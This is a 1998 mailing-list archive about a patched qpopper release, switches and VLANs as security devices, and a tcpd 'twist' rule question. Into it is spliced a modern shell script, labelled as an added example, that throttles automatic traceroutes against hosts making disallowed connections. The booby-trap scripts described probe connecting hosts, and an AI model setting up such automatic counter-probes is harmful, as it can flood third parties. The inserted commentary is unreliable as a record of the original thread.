Hi,
well, swift response!
Qualcomm has a patched qpopper (2.5)
Greetings,
Jan-Philip Velders
<jpv@jvelders.tn.tudelft.nl>
---------- Forwarded message ----------
Date: Mon, 29 Jun 1998 21:43:18 -0700
From: Praveen Yaramada <pyaramad@QUALCOMM.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: Patched Qpopper2.5 release Notification.
Hello Folks,
As you are already aware, qpopper 2.41 and prior are vulnerable to a
buffer overflow, thereby causing a security breach. A patched qpopper 2.5 is
made available at
http://ftp.qualcomm.com/eudora/servers/unix/popper/qpopper2.5.tar.Z.
This server release is immune to all the known security holes posted on
bugtraq@netspace.org. Please upgrade or patch your server if you are
running any qpopper older than 2.5.
Many thanks to all the people who posted these bugs and patches.
Thanks
Praveen Yaramada.
From mail@mail.redhat.com Wed Jul 1 07:18:54 1998
Received: (qmail 28077 invoked from network); 1 Jul 1998 05:22:11 -0000
Received: from 3dyn40.delft.casema.net (HELO rosie.BitWizard.nl)
(@195.96.104.40)
by mail2.redhat.com with SMTP; 1 Jul 1998 05:22:11 -0000
Received: from cave.BitWizard.nl (cave.BitWizard.nl [130.161.127.248])
by rosie.BitWizard.nl (8.8.5/8.8.5) with ESMTP id HAA30366
for <linux-security@redhat.com>; Wed, 1 Jul 1998 07:18:54 +0200
Received: (from wolff@localhost) by cave.BitWizard.nl (8.8.5/8.7.3) id HAA00855
for linux-security@redhat.com; Wed, 1 Jul 1998 07:22:30 +0200
Received: from dutepp0.et.tudelft.nl
by rosie.BitWizard.nl (fetchmail-4.2.9 POP3 run by wolff)
Approved: R.E.Wolff@BitWizard.nl
for <wolff@localhost> (single-drop); Tue Jun 30 18:40:33 1998
Received: from ferryman.ocn.nl (root@ferryman.ocn.nl [193.78.195.1])
by dutepp0.et.tudelft.nl (8.8.8/8.8.8/CARDIT) with SMTP id SAA23905
for <wolff@dutepp0.et.tudelft.nl>; Tue, 30 Jun 1998 18:42:06 +0200 (MET
DST)
Received: from mail2.redhat.com (mail2.redhat.com [199.183.24.247]) by
ferryman.ocn.nl (8.6.13/8.6.9) with SMTP id SAA17626 for
<r.e.wolff@BitWizard.nl>; Tue, 30 Jun 1998 18:30:52 +0200
Received: (qmail 19389 invoked by uid 501); 30 Jun 1998 16:42:01 -0000
Received: (qmail 19017 invoked from network); 30 Jun 1998 16:41:36 -0000
Received: from ra.scif.com (206.202.64.7)
by mail2.redhat.com with SMTP; 30 Jun 1998 16:41:36 -0000
Received: from flowers.wiltelnsi.com (mkallen [10.2.27.152])
by ra.scif.com (8.8.8/8.8.8) with SMTP id JAA22546;
Tue, 30 Jun 1998 09:39:38 -0700 (PDT)
Message-Id: <3.0.5.32.19980630093214.00b12250@mailhost.wiltelnsi.com>
X-Sender: woody@mailhost.wiltelnsi.com
X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32)
Date: Tue, 30 Jun 1998 09:32:14 -0700
To: Christopher Hicks <chicks@chicks.net>
From: Woody Weaver <woody@wiltelnsi.com>
Subject: [linux-security] Re: A switch? A router? What am I
looking for??
Cc: security@kokoro.com, firewalls@lists.gnac.net, linux-security@redhat.com
In-Reply-To: <Pine.LNX.3.96.980630015230.9657c-100000@yakko.chicks.net>
References: <3.0.5.32.19980629130441.00aa3520@mailhost.wiltelnsi.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
X-moderate: yes
At 02:00 AM 6/30/98 -0400, Christopher Hicks wrote:
>On Mon, 29 Jun 1998, Woody Weaver wrote:
>> Put in a switch to improve bandwidth, not out of a sense of security.
>
>Security in depth is good. A switch's primary purpose is and should be
>improved bandwidth. But it also helps security. MAC floods can be
>detected. That's enough to dissuade some threats. The attraction of
>packet sniffing attacks is the difficulty of detection.
I agree with Chris' statement, but I agree with mine as well.
From the original author's comment, I deduced (incorrectly perhaps) that he
was trying to find out what a switch was, and if it would be a security
device. For a novice, imho, a switch is only a collision-domain
manipulator, *not* a secure device. In particular, I would be concerned
that a novice would drop a switch in place and believe that he was safe
against passive sniffing attacks. Far better is to make as a criterion of
the security policy which machines are able to see traffic from other
machines, and choose an appropriate appliance or procedure to enforce that
policy.
>But the principle of security in depth is the real issue I'm trying to
>address. It is often missed. Just because a switch or a firewall or a
>lock on a file cabinet isn't perfect does not mean that it shouldn't be
>part of a complete security plan. People lock their office door then
>leave root logged in. People buy a firewall and then run their systems
>without patches or proper passwords. Bad. Bad. There are few either-or
>choices in security that shouldn't be answered "both".
Please note the first sentence does not correspond to the examples listed.
All the examples listed correspond to violations of (an implied) security
policy, *not* missing security in depth. I *like* security in depth. When
I have the luxury, I have one vendor's firewall on the perimeter, another
vendor's firewall for the interior, and specify file encryptors and
end-to-end encryption on administrative traffic. Belts and suspenders are
good things, when money/convenience is outweighed by the risk/value
computation.
What I'd like to point out (that is often missed) is that security
implementations must follow from the security policy -- not vice versa --
and that screwdrivers are not chisels even though they share some features.
If the security policy states that machine A is not to see machine B's
traffic, then the answer is not "let's buy a switch" -- it's a little deeper
than that, and it might involve buying a secure switch, but then it also
involves a good deal of thought about configuration of the switch, and so on.
>
></chris>
--woody
--
Robert Wooddell Weaver email: woody.weaver@wiltelnsi.com
Network Engineer voice: 510.358.3972
Williams Communication Solutions pager: 510.702.4334
From mail@mail.redhat.com Wed Jul 1 07:18:58 1998
Received: (qmail 28171 invoked from network); 1 Jul 1998 05:22:14 -0000
Received: from 3dyn40.delft.casema.net (HELO rosie.BitWizard.nl)
(@195.96.104.40)
by mail2.redhat.com with SMTP; 1 Jul 1998 05:22:14 -0000
Received: from cave.BitWizard.nl (cave.BitWizard.nl [130.161.127.248])
by rosie.BitWizard.nl (8.8.5/8.8.5) with ESMTP id HAA30370
for <linux-security@redhat.com>; Wed, 1 Jul 1998 07:18:58 +0200
Received: (from wolff@localhost) by cave.BitWizard.nl (8.8.5/8.7.3) id HAA00870
for linux-security@redhat.com; Wed, 1 Jul 1998 07:22:33 +0200
Received: from dutepp0.et.tudelft.nl
by rosie.BitWizard.nl (fetchmail-4.2.9 POP3 run by wolff)
Approved: R.E.Wolff@BitWizard.nl
for <wolff@localhost> (single-drop); Tue Jun 30 19:22:17 1998
Received: from ferryman.ocn.nl (root@ferryman.ocn.nl [193.78.195.1])
by dutepp0.et.tudelft.nl (8.8.8/8.8.8/CARDIT) with SMTP id TAA24408
for <wolff@dutepp0.et.tudelft.nl>; Tue, 30 Jun 1998 19:22:47 +0200 (MET
DST)
Received: from mail2.redhat.com (mail2.redhat.com [199.183.24.247]) by
ferryman.ocn.nl (8.6.13/8.6.9) with SMTP id TAA17651 for
<r.e.wolff@BitWizard.nl>; Tue, 30 Jun 1998 19:11:33 +0200
Received: (qmail 797 invoked by uid 501); 30 Jun 1998 17:22:41 -0000
Received: (qmail 32677 invoked from network); 30 Jun 1998 17:22:12 -0000
Received: from ra.scif.com (206.202.64.7)
by mail2.redhat.com with SMTP; 30 Jun 1998 17:22:12 -0000
Received: from flowers.wiltelnsi.com (mkallen [10.2.27.152])
by ra.scif.com (8.8.8/8.8.8) with SMTP id KAA23859;
Tue, 30 Jun 1998 10:20:19 -0700 (PDT)
Message-Id: <3.0.5.32.19980630094647.00b25300@mailhost.wiltelnsi.com>
X-Sender: woody@mailhost.wiltelnsi.com
X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32)
Date: Tue, 30 Jun 1998 09:46:47 -0700
To: "Youn Gonzales" <ispmgr@clas.net>
From: Woody Weaver <woody@wiltelnsi.com>
Subject: [linux-security] Re: A switch? A router? What am I
looking for??
Cc: <firewalls@lists.gnac.net>, <linux-security@redhat.com>
In-Reply-To: <006901bda436$ebba8260$813112d0@burrito.run.for.the.border>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
X-moderate: yes
At 09:52 AM 6/30/98 -0500, you wrote:
>A switch can be used as a security device. Many of the newer switches can be
>configured to support multiple VLANs which prohibit machines on one VLAN
[...]
You know, I considered talking about vlans when I started writing up
definitions. But I figured that if the guy didn't know what a switch was,
a vlan would just further confuse him.
imho, a vlan is a device to manipulate broadcast domains (and by
implication collision domains) and again *not* a security device. The
"best" use of vlans is when you have distributed users and want to share
resources among just those users, e.g. engineering is IP network X, sales
is IP network Y, but their cubes are distributed among half a dozen floors
-- I can now plug-n-play among the switch community without regard for
physical location. Now I can have broadcast level services, such as DHCP,
without extensive configuration of user machines.
Will vlan enabled switches be part of a security design? Perhaps. Right
now, I just don't know how hardened the switch will be against security
attacks -- they weren't _designed_ with security in mind. Has cisco ever
fixed the syn-loop attack against their catalyst switches? Does this give
you a warm and fuzzy feeling that other problems won't be found? Do you
want to use an appliance with potentially unknown characteristics in your
security implementation?
Please note that I very much accept the answer that in some designs the
answer is YES! Security is always something personal to a specific site,
and a particular time and computation.
--woody
--
Robert Wooddell Weaver email: woody.weaver@wiltelnsi.com
Network Engineer voice: 510.358.3972
Williams Communication Solutions pager: 510.702.4334
From mail@mail.redhat.com Thu Jul 2 08:10:12 1998
Received: (qmail 16630 invoked from network); 2 Jul 1998 06:13:24 -0000
Received: from 3dyn113.delft.casema.net (HELO rosie.BitWizard.nl)
(@195.96.104.113)
by mail2.redhat.com with SMTP; 2 Jul 1998 06:13:24 -0000
Received: from cave.BitWizard.nl (cave.BitWizard.nl [130.161.127.248])
by rosie.BitWizard.nl (8.8.5/8.8.5) with ESMTP id IAA00761
for <linux-security@redhat.com>; Thu, 2 Jul 1998 08:10:12 +0200
Received: (from wolff@localhost) by cave.BitWizard.nl (8.8.5/8.7.3) id IAA00719
for linux-security@redhat.com; Thu, 2 Jul 1998 08:13:41 +0200
Received: from dutepp0.et.tudelft.nl
by rosie.BitWizard.nl (fetchmail-4.2.9 POP3 run by wolff)
Approved: R.E.Wolff@BitWizard.nl
for <wolff@localhost> (single-drop); Wed Jul 1 19:14:02 1998
Received: from ferryman.ocn.nl (root@ferryman.ocn.nl [193.78.195.1])
by dutepp0.et.tudelft.nl (8.8.8/8.8.8/CARDIT) with SMTP id TAA09275
for <wolff@dutepp0.et.tudelft.nl>; Wed, 1 Jul 1998 19:14:58 +0200 (MET
DST)
Received: from mail2.redhat.com (mail2.redhat.com [199.183.24.247]) by
ferryman.ocn.nl (8.6.13/8.6.9) with SMTP id TAA18480 for
<r.e.wolff@BitWizard.nl>; Wed, 1 Jul 1998 19:03:44 +0200
Received: (qmail 14274 invoked by uid 501); 1 Jul 1998 17:14:51 -0000
Received: (qmail 5913 invoked from network); 1 Jul 1998 17:10:26 -0000
Received: from gw-pini.funkey.com (HELO linux.rpini.com) (193.192.247.149)
by mail2.redhat.com with SMTP; 1 Jul 1998 17:10:26 -0000
Received: from remo (remo.rpini.com [193.192.247.151])
by linux.rpini.com (8.8.8/8.8.8) with SMTP id SAA21092
for <linux-security@redhat.com>; Wed, 1 Jul 1998 18:11:37 +0200
Message-Id: <199807011611.SAA21092@linux.rpini.com>
X-Sender: remo@hades.rpini.com
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.0.1
Date: Wed, 01 Jul 1998 19:10:08 +0200
To: linux-security@redhat.com
From: Remo Pini <rp@rpini.com>
Subject: [linux-security] Re: A switch? A router? What am I
looking for??
In-Reply-To: <3.0.5.32.19980630094647.00b25300@mailhost.wiltelnsi.com>
References: <006901bda436$ebba8260$813112d0@burrito.run.for.the.border>
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-moderate: yes
>imho, a vlan is a device to manipulate broadcast domains (and by
>implication collision domains) and again *not* a security device. The
>"best" use of vlans is when you have distributed users and want to share
>resources among just those users, e.g. engineering is IP network X, sales
>is IP network Y, but their cubes are distributed among half a dozen floors
Oh yes they are. Swiss military for example accepts a non-routed VLAN as a
secure subnet (in an ATM LANE environment). VLANs are/will be a vital part
of our LAN-security (especially combined with a MAC-based VLAN-policy).
Greets,
Remo
-----------------------------------------------------
Fatum favet volenti. (anon)
-----------------------------------------------------
Remo Pini ++++++++++++++++++++++++ T: +41 1 350 28 88
Pini Computer Trading +++++++++++ N: +41 79 216 15 51
http://www.rpini.com/ +++++++++ Email: rp@rpini.com
-----------------------------------------------------
[mod: Remo, get rid of those non-ascii chars in your .sig. --REW]
From mail@mail.redhat.com Thu Jul 2 08:12:05 1998
Received: (qmail 18566 invoked from network); 2 Jul 1998 06:15:14 -0000
Received: from 3dyn113.delft.casema.net (HELO rosie.BitWizard.nl)
(@195.96.104.113)
by mail2.redhat.com with SMTP; 2 Jul 1998 06:15:14 -0000
Received: from cave.BitWizard.nl (cave.BitWizard.nl [130.161.127.248])
by rosie.BitWizard.nl (8.8.5/8.8.5) with ESMTP id IAA00766
for <linux-security@redhat.com>; Thu, 2 Jul 1998 08:12:05 +0200
Received: (from wolff@localhost) by cave.BitWizard.nl (8.8.5/8.7.3) id IAA00740
for linux-security@redhat.com; Thu, 2 Jul 1998 08:15:34 +0200
Received: from dutepp0.et.tudelft.nl
by rosie.BitWizard.nl (fetchmail-4.2.9 POP3 run by wolff)
Approved: R.E.Wolff@BitWizard.nl
for <wolff@localhost> (single-drop); Wed Jul 1 21:57:50 1998
Received: from ferryman.ocn.nl (root@ferryman.ocn.nl [193.78.195.1])
by dutepp0.et.tudelft.nl (8.8.8/8.8.8/CARDIT) with SMTP id VAA11265
for <wolff@dutepp0.et.tudelft.nl>; Wed, 1 Jul 1998 21:58:19 +0200 (MET
DST)
Received: from mail2.redhat.com (mail2.redhat.com [199.183.24.247]) by
ferryman.ocn.nl (8.6.13/8.6.9) with SMTP id VAA18585 for
<r.e.wolff@BitWizard.nl>; Wed, 1 Jul 1998 21:47:05 +0200
Received: (qmail 26803 invoked by uid 501); 1 Jul 1998 19:58:08 -0000
Received: (qmail 26280 invoked from network); 1 Jul 1998 19:57:34 -0000
Received: from www.inx.de (root@195.21.255.251)
by mail2.redhat.com with SMTP; 1 Jul 1998 19:57:34 -0000
Received: by www.inx.de (Smail3.2.0.96inx)
from hellraiser.mindstar.bogus (195.21.34.183) with esmtp
id <m0yrT0V-000oltC>; Wed, 1 Jul 1998 21:57:31 +0200 (MET DST)
Received: (from pluto@localhost)
by hellraiser.mindstar.bogus (8.8.8/8.8.8) id VAA21252;
Wed, 1 Jul 1998 21:59:07 +0200
Date: Wed, 1 Jul 1998 21:59:07 +0200 (CEST)
From: Pluto <pluto@pizzaservice.de>
X-Sender: pluto@hellraiser.mindstar.bogus
Reply-To: pluto@pizzaservice.de
To: Linux Security <linux-security@redhat.com>
Subject: tcpd anomaly
In-Reply-To: <199807010231.EAA18365@iconnect.de>
Message-ID:
<Pine.LNX.3.96.980701204911.21000G-100000@hellraiser.mindstar.bogus>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-moderate: yes
Salve,
I'm protecting hades with the tcpd wrappers and had no problems so far,
at least none that I noticed.
Today something strange happened. An attacker got a connect on a
protected port from an IP that is not allowed:
> Unusual System Events
> =-=-=-=-=-=-=-=-=-=-
BTW, thanks for that tool.
> Jul 1 03:34:56 hades in.null[18321]: twist
> slip139-92-93-124.hol.ch.ibm.net to perl /usr/sbin/get_em.pl
> 139.92.93.124 unknown slip139-92-93-124.hol.ch.ibm.net in.null 2>>
> /var/log/get_em_err
This is OK and has happened a dozen times a week in the last year. He
comes from ch.ibm.net where only de.ibm.net is allowed and is routed to a
little homegrown script that logs some stuff like traceroute and finger.
> Jul 1 03:35:00 hades in.null[18324]: twist
> slip139-92-93-124.hol.ch.ibm.net to perl /usr/sbin/get_em.pl
> 139.92.93.124 unknown slip139-92-93-124.hol.ch.ibm.net in.null 2>>
> /var/log/get_em_err
And again, still OK.
> Jul 1 03:35:05 hades in.telnetd[18327]: connect from
> slip139-92-93-124.hol.ch.ibm.net
But now that! It hasn't happened before, and I think the fast reconnects
after 4-5 sec. are on purpose; nobody has done it like that before, and I
got a lot more of this in the logfiles.
Seems like tcpd is still busy with the last two scripts and doesn't even
look at the connect. Or do I miss something? Do the scripts have to have
a '&' at the end of the line to prevent it? Or is it a bug of the tcpd
wrappers?
Yours troubled
Pluto - SysAdmin of Hades
We are NSA, your mail will be scrutinized, resistance is futile! =:-)
Key fingerprint: 1F 3F EA 94 D0 56 A6 86 4D 19 C4 56 6C F9 43 44
Boren's Laws:
(1) When in charge, ponder.
(2) When in trouble, delegate.
(3) When in doubt, mumble.
From mail@mail.redhat.com Fri Jul 3 11:33:55 1998
Received: (qmail 24747 invoked from network); 3 Jul 1998 09:36:58 -0000
Received: from 3dyn207.delft.casema.net (HELO rosie.BitWizard.nl)
(@195.96.104.207)
by mail2.redhat.com with SMTP; 3 Jul 1998 09:36:58 -0000
Received: from cave.BitWizard.nl (cave.BitWizard.nl [130.161.127.248])
by rosie.BitWizard.nl (8.8.5/8.8.5) with ESMTP id LAA04178
for <linux-security@redhat.com>; Fri, 3 Jul 1998 11:33:55 +0200
Received: (from wolff@localhost) by cave.BitWizard.nl (8.8.5/8.7.3) id LAA00994
for linux-security@redhat.com; Fri, 3 Jul 1998 11:37:16 +0200
Received: from dutepp0.et.tudelft.nl
by rosie.BitWizard.nl (fetchmail-4.2.9 POP3 run by wolff)
Approved: R.E.Wolff@BitWizard.nl
for <wolff@localhost> (single-drop); Thu Jul 2 13:58:02 1998
Received: from ferryman.ocn.nl (root@ferryman.ocn.nl [193.78.195.1])
by dutepp0.et.tudelft.nl (8.8.8/8.8.8/CARDIT) with SMTP id NAA20598
for <wolff@dutepp0.et.tudelft.nl>; Thu, 2 Jul 1998 13:59:37 +0200 (MET
DST)
Received: from mail2.redhat.com (mail2.redhat.com [199.183.24.247]) by
ferryman.ocn.nl (8.6.13/8.6.9) with SMTP id NAA19126 for
<r.e.wolff@BitWizard.nl>; Thu, 2 Jul 1998 13:48:22 +0200
Received: (qmail 2092 invoked by uid 501); 2 Jul 1998 11:57:28 -0000
Received: (qmail 284 invoked from network); 2 Jul 1998 11:56:29 -0000
Received: from umbilical.porcupine.org (HELO spike.porcupine.org)
(168.100.189.1)
by mail2.redhat.com with SMTP; 2 Jul 1998 11:56:29 -0000
Received: by spike.porcupine.org (VMailer, from userid 100)
id 45875E0CF0; Thu, 2 Jul 1998 07:55:29 -0400 (EDT)
Subject: [linux-security] Re: tcpd anomaly
To: linux-security@redhat.com
Date: Thu, 2 Jul 1998 07:55:29 -0400 (EDT)
In-Reply-To:
<Pine.LNX.3.96.980701204911.21000G-100000@hellraiser.mindstar.bogus> from
Pluto at "Jul 1, 98 09:59:07 pm"
Organization: Wietse Venema, White Plains, NY, USA
X-Time-Zone: USA EST, 6 hours behind central European time
X-Mailer: ELM [version 2.4ME+ PL15 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-Id: <19980702115529.45875E0CF0@spike.porcupine.org>
From: wietse@porcupine.org (Wietse Venema)
X-moderate: yes
Sorry for discussing sysadmin stuff in a security group. Normally
people contact me via direct email when they have a problem.
A new tcpd instance is run for each connection; each tcpd instance
handles its connection independently from other connections.
So, when telnet connections from the same site are given different
treatment, something has changed from one connection to the other,
and it is up to you to figure out what.
Very likely, something has changed locally to your system.
I suggest that you check out the rules with the tcpdchk and tcpdmatch
configuration checking utilities. These programs are part of the
tcp wrappers source distribution; your software vendor may or may
not have bundled them with the system.
Wietse
P.S. Appending "&" to a "twist" command will screw it up: the shell
will close the standard input of the twisted command, so it can't
read from the network.
Pluto:
> Salve,
>
> I'm protecting hades with the tcpd wrappers and had no problems so far,
> at least none that I noticed.
>
> Today something strange happened. An attacker got a connect on a
> protected port from an IP that is not allowed:
>
> > Unusual System Events
> > =-=-=-=-=-=-=-=-=-=-
> BTW, thanks for that tool.
>
> > Jul 1 03:34:56 hades in.null[18321]: twist
> > slip139-92-93-124.hol.ch.ibm.net to perl /usr/sbin/get_em.pl
> > 139.92.93.124 unknown slip139-92-93-124.hol.ch.ibm.net in.null 2>>
> > /var/log/get_em_err
>
> This is OK and has happened a dozen times a week in the last year. He
> comes from ch.ibm.net where only de.ibm.net is allowed and is routed to a
> little homegrown script that logs some stuff like traceroute and finger.
>
> > Jul 1 03:35:00 hades in.null[18324]: twist
> > slip139-92-93-124.hol.ch.ibm.net to perl /usr/sbin/get_em.pl
> > 139.92.93.124 unknown slip139-92-93-124.hol.ch.ibm.net in.null 2>>
> > /var/log/get_em_err
>
> And again, still OK.
>
> > Jul 1 03:35:05 hades in.telnetd[18327]: connect from
> > slip139-92-93-124.hol.ch.ibm.net
>
> But now that! It hasn't happened before, and I think the fast reconnects
> after 4-5 sec. are on purpose; nobody has done it like that before, and I
> got a lot more of this in the logfiles.
> Seems like tcpd is still busy with the last two scripts and doesn't even
> look at the connect. Or do I miss something? Do the scripts have to have
> a '&' at the end of the line to prevent it? Or is it a bug of the tcpd
> wrappers?
>
> Yours troubled
>
> Pluto - SysAdmin of Hades
> We are NSA, your mail will be scrutinized, resistance is futile! =:-)
> Key fingerprint: 1F 3F EA 94 D0 56 A6 86 4D 19 C4 56 6C F9 43 44
>
> Boren's Laws:
> (1) When in charge, ponder.
> (2) When in trouble, delegate.
> (3) When in doubt, mumble.
>
> --
> ----------------------------------------------------------------------
> Please refer to the information about this list as well as general
> information about Linux security at http://www.aoy.com/Linux/Security.
> ----------------------------------------------------------------------
>
> To unsubscribe:
> mail -s unsubscribe linux-security-request@redhat.com < /dev/null
>
>
>
From mail@mail.redhat.com Fri Jul 3 11:33:50 1998
Received: (qmail 24742 invoked from network); 3 Jul 1998 09:36:55 -0000
Received: from 3dyn207.delft.casema.net (HELO rosie.BitWizard.nl)
(@195.96.104.207)
by mail2.redhat.com with SMTP; 3 Jul 1998 09:36:55 -0000
Received: from cave.BitWizard.nl (cave.BitWizard.nl [130.161.127.248])
by rosie.BitWizard.nl (8.8.5/8.8.5) with ESMTP id LAA04174
for <linux-security@redhat.com>; Fri, 3 Jul 1998 11:33:50 +0200
Received: (from wolff@localhost) by cave.BitWizard.nl (8.8.5/8.7.3) id LAA00979
for linux-security@redhat.com; Fri, 3 Jul 1998 11:37:12 +0200
Received: from dutepp0.et.tudelft.nl
by rosie.BitWizard.nl (fetchmail-4.2.9 POP3 run by wolff)
Approved: R.E.Wolff@BitWizard.nl
for <wolff@localhost> (single-drop); Fri Jul 3 10:50:37 1998
Received: from ferryman.ocn.nl (root@ferryman.ocn.nl [193.78.195.1])
by dutepp0.et.tudelft.nl (8.8.8/8.8.8/CARDIT) with SMTP id BAA28772
for <wolff@dutepp0.et.tudelft.nl>; Fri, 3 Jul 1998 01:32:26 +0200 (MET
DST)
Received: from mail2.redhat.com (mail2.redhat.com [199.183.24.247]) by
ferryman.ocn.nl (8.6.13/8.6.9) with SMTP id BAA19524 for
<r.e.wolff@BitWizard.nl>; Fri, 3 Jul 1998 01:21:06 +0200
Received: (qmail 26419 invoked by uid 501); 2 Jul 1998 23:32:15 -0000
Received: (qmail 14525 invoked from network); 2 Jul 1998 23:25:17 -0000
Received: from unknown (HELO warp.bascservice.org) (root@203.188.253.61)
by mail2.redhat.com with SMTP; 2 Jul 1998 23:25:17 -0000
Received: from thing.annexgrp.org (tunl.annexgrp.org [203.188.254.166])
by warp.bascservice.org (8.8.7/8.8.7) with ESMTP id FAA05418;
Fri, 3 Jul 1998 05:21:10 +0600
Received: from localhost (annex@localhost)
by thing.annexgrp.org (8.9.0/8.9.0) with SMTP id FAA10910;
Fri, 3 Jul 1998 05:23:38 +0600
Date: Fri, 3 Jul 1998 05:23:32 +0600 (BGT)
From: Annex <annex@thing.annexgrp.org>
To: Pluto <pluto@pizzaservice.de>
cc: Linux Security <linux-security@redhat.com>
Subject: [linux-security] Re: tcpd anomaly
In-Reply-To:
<Pine.LNX.3.96.980701204911.21000G-100000@hellraiser.mindstar.bogus>
Message-ID: <Pine.BOO.3.96.980703051741.10894A-100000@thing.annexgrp.org>
Organization: Annex Group (Bangladesh)
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-moderate: yes
On Wed, 1 Jul 1998, Pluto wrote:
| Seems like tcpd is still busy with the last two scripts and doesn't even
| look at the connect. Or do I miss something? Do the scripts have to have
| a '&' at the end of the line to prevent it? Or is it a bug of the tcpd
well.. I used to use a boobytrap on port 139 for outside IPs with TCPD..
whose job was to mail me the source IP immediately.. until.. I got hit by
this person.. who used 28 diff IPs to hit port 139 repeatedly.. and it was
so hard on my machine.. that the HD LED never went out before I power
cycled it after like 15 mins of non-responsiveness :(
I had an "&" at the end
this is something you should be aware of when running something like an
external shell script or a program from tcpd using twist or without..
---
Annex
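The three messages above circle the same operational point: Pluto asks whether a twisted script needs a trailing "&", Wietse answers that backgrounding the twist target detaches it from the socket, and Annex describes a booby-trap script that ran traceroute/finger per connection until 28 source addresses hammering it drove the machine into the ground. The script below is an added example (not code from any poster on this thread) of a twist target that keeps the socket on its own stdin, detaches only the slow probe with stdin explicitly pointed at /dev/null, and caps the number of slow probes per source address per time window so a burst of connections costs bounded work. The script path, the state directory, the `in.null` service name and the limits are assumptions; the `%a %h %d` expansions are the documented tcpd macros for client address, client hostname and daemon name.

```shell
#!/bin/sh
# Added example: a tcpd "twist" target that logs the probe, rate-limits the slow
# follow-up work per source address, and never puts the twisted shell itself in
# the background.
#
# Assumed hosts.allow entry (path and service name are made up for this example):
#   in.null : ALL EXCEPT .de.ibm.net : twist /usr/local/sbin/trap.sh %a %h %d
#
# tcpd runs the twist line via /bin/sh -c with the client socket as stdin/stdout.
# A trailing "&" in that line backgrounds the whole script, and a non-interactive
# shell then hands the background job /dev/null as stdin, so the script loses the
# connection. Here only the slow probe is detached, and it gets /dev/null on purpose.

STATE_DIR=${STATE_DIR:-/var/run/tcpd-trap}   # one timestamp file per source address
LIMIT=${LIMIT:-3}                            # slow probes allowed per source per window
WINDOW=${WINDOW:-300}                        # window length in seconds

# allow_probe ADDR NOW: return 0 if a slow probe of ADDR may run at time NOW,
# 1 if ADDR has already used its quota inside the window. Timestamps older than
# NOW-WINDOW are dropped first, so old bursts age out.
allow_probe() {
    addr=$1
    now=$2
    f="$STATE_DIR/$addr"
    mkdir -p "$STATE_DIR"
    if [ -f "$f" ]; then
        awk -v now="$now" -v w="$WINDOW" '$1 > now - w' "$f" > "$f.new" && mv "$f.new" "$f"
    else
        : > "$f"
    fi
    n=$(wc -l < "$f" | tr -d ' ')
    if [ "$n" -ge "$LIMIT" ]; then
        return 1
    fi
    echo "$now" >> "$f"
    return 0
}

# main ADDR HOST DAEMON: the entry point tcpd invokes for each matched connection.
main() {
    addr=$1
    host=$2
    daemon=$3
    now=$(date +%s)
    logger -p auth.notice -t trap "$daemon probe from $host [$addr]"
    if allow_probe "$addr" "$now"; then
        # Detach the slow work in a subshell. Its stdin is /dev/null so it can never
        # touch the client socket; this script exits at once, which closes the connection.
        ( traceroute -n -m 15 "$addr" >> /var/log/get_em.log 2>&1 </dev/null & )
    else
        logger -p auth.warning -t trap "throttled $addr: $n probes within ${WINDOW}s"
    fi
}

# Only act when invoked by tcpd with its three arguments; sourcing just defines functions.
if [ $# -ge 3 ]; then
    main "$@"
fi
```

The limit is per source address, so an attacker using many addresses (Annex's 28) still gets LIMIT probes each; if that matters, add a second counter keyed on a fixed name for a global cap. Nothing here changes tcpd's own behaviour: as Wietse says, each connection gets its own tcpd, so a busy twist script cannot make a later telnet connection bypass the rules, and a telnetd "connect from" line for a host that was twisted seconds earlier still points at the access rules, which tcpdchk and tcpdmatch will show.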
From mail@mail.redhat.com Fri Jul 3 11:37:12 1998
Received: (qmail 27361 invoked from network); 3 Jul 1998 09:40:15 -0000
Received: from 3dyn207.delft.casema.net (HELO rosie.BitWizard.nl)
(@195.96.104.207)
by mail2.redhat.com with SMTP; 3 Jul 1998 09:40:15 -0000
Received: from cave.BitWizard.nl (cave.BitWizard.nl [130.161.127.248])
by rosie.BitWizard.nl (8.8.5/8.8.5) with ESMTP id LAA04192
for <linux-security@redhat.com>; Fri, 3 Jul 1998 11:37:12 +0200
Received: (from wolff@localhost) by cave.BitWizard.nl (8.8.5/8.7.3) id LAA01092
for linux-security@redhat.com; Fri, 3 Jul 1998 11:40:34 +0200
Received: from dutepp0.et.tudelft.nl
by rosie.BitWizard.nl (fetchmail-4.2.9 POP3 run by wolff)
Approved: R.E.Wolff@BitWizard.nl
for <wolff@localhost> (single-drop); Thu Jul 2 16:54:00 1998
Received: from ferryman.ocn.nl (root@ferryman.ocn.nl [193.78.195.1])
by dutepp0.et.tudelft.nl (8.8.8/8.8.8/CARDIT) with SMTP id QAA23487
for <wolff@dutepp0.et.tudelft.nl>; Thu, 2 Jul 1998 16:55:42 +0200 (MET
DST)
Received: from mail2.redhat.com (mail2.redhat.com [199.183.24.247]) by
ferryman.ocn.nl (8.6.13/8.6.9) with SMTP id QAA19277 for
<r.e.wolff@BitWizard.nl>; Thu, 2 Jul 1998 16:44:27 +0200
Received: (qmail 20420 invoked by uid 501); 2 Jul 1998 14:54:31 -0000
Received: (qmail 20191 invoked from network); 2 Jul 1998 14:54:23 -0000
Received: from ns.chapwin.com (root@209.167.122.121)
by mail2.redhat.com with SMTP; 2 Jul 1998 14:54:23 -0000
Received: from chapwin.com (rick@gateway.chapwin.com [209.167.122.120])
by ns.chapwin.com (8.8.7/8.8.7) with ESMTP id JAA07359;
Thu, 2 Jul 1998 09:53:26 -0500
Message-Id: <199807021453.JAA07359@ns.chapwin.com>
Date: Thu, 2 Jul 1998 09:53:53 -0500 (CDT)
From: rick@chapwin.com
Reply-To: rick@chapwin.com
Subject: [linux-security] Re: tcpd anomaly
To: pluto@pizzaservice.de
cc: linux-security@redhat.com
In-Reply-To:
<Pine.LNX.3.96.980701204911.21000G-100000@hellraiser.mindstar.bogus>
MIME-Version: 1.0
Content-Type: TEXT/plain; CHARSET=US-ASCII
